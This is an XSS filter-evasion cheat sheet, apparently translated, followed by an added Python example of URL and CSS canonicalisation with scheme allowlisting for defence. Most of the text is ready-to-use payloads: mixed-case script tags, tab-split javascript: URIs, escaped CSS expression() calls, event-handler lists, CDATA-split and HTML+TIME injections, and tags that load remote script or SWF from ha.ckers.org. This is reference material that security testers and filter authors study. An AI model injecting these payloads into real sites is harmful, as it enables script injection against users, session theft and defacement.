1. Change the case of characters

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
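The evasions in items 1, 6, 7, 8 and 14 all beat filters that pattern-match the raw input; the defensive answer is to canonicalise the value the way the browser will (decode entities with or without the ";", drop control characters, resolve CSS escapes and comments) and then allowlist URL schemes instead of denylisting "javascript". The example below is added here and is not code from the original post; every function and constant name in it is an assumption.

```python
import html
import re

# Assumed names; this is an added example, not code from the original post.
# C0 controls and DEL: browsers drop tab/LF/CR inside a URL and ignore leading
# controls, so removing all of them errs on the rejecting side (item 6).
_CONTROLS = re.compile(r"[\x00-\x1f\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6}[ \t\n]?|.)", re.DOTALL)
_CSS_DANGEROUS = re.compile(r"expression\s*\(|javascript\s*:|@import")
SAFE_SCHEMES = {"http", "https", "mailto"}


def canonical_url(value: str) -> str:
    """Decode entities, with or without the ';' (item 8), drop controls (item 6)
    and trim; after this, case changes (item 1) cannot hide the scheme."""
    return _CONTROLS.sub("", html.unescape(value)).strip()


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the canonical value, or '' for a relative URL."""
    m = _SCHEME.match(canonical_url(value))
    return m.group(1).lower() if m else ""


def is_safe_url(value: str) -> bool:
    """Allowlist, not denylist: only known-harmless schemes or relative URLs pass."""
    scheme = url_scheme(value)
    return scheme == "" or scheme in SAFE_SCHEMES


def canonical_css(value: str) -> str:
    """Strip comments and resolve backslash escapes (item 7) so expre\\ssion and
    expr/**/ession read as one token. Quoted strings are not tokenised here."""
    decoded = _CSS_COMMENT.sub("", html.unescape(value))

    def unescape(m):
        tok = m.group(1)
        hexpart = tok.rstrip(" \t\n")
        if re.fullmatch(r"[0-9a-fA-F]{1,6}", hexpart):
            return chr(int(hexpart, 16))  # \65 -> 'e'
        return tok  # \s -> 's'

    return _CSS_ESCAPE.sub(unescape, decoded).lower()


def is_safe_style(value: str) -> bool:
    """Reject inline styles that canonicalise to expression(), javascript: or @import."""
    return _CSS_DANGEROUS.search(canonical_css(value)) is None
```

Comment markers inside a quoted CSS string (the last payload of item 7) are not handled by this regex approach and need a real CSS tokenizer; in practice, user-controlled inline style should be rejected outright.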